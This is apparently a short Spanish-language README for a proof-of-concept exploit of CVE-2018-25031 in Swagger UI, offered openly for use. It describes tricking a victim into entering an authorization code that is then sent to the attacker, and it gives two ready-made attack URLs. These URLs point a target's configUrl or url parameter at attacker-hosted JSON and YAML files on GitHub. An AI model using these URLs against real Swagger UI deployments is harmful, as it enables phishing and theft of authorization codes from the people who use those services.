
Prueba de concepto del exploit para CVE-2018-25031 (XSS en Swagger UI) que exfiltra códigos de autorización mediante parámetros configUrl/url manipulados.
Un simple POC (CVE-2018-25031) que engaña a la víctima para que ingrese el código de autorización, el cual luego se envía al atacante.
Puedes usarlo con la vulnerabilidad XSS https://github.com/VictorNS69/swagger-ui-xss
Es necesario encontrar el parámetro y asignar el archivo correcto: para configUrl, el archivo JSON, y para url, el archivo YAML.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031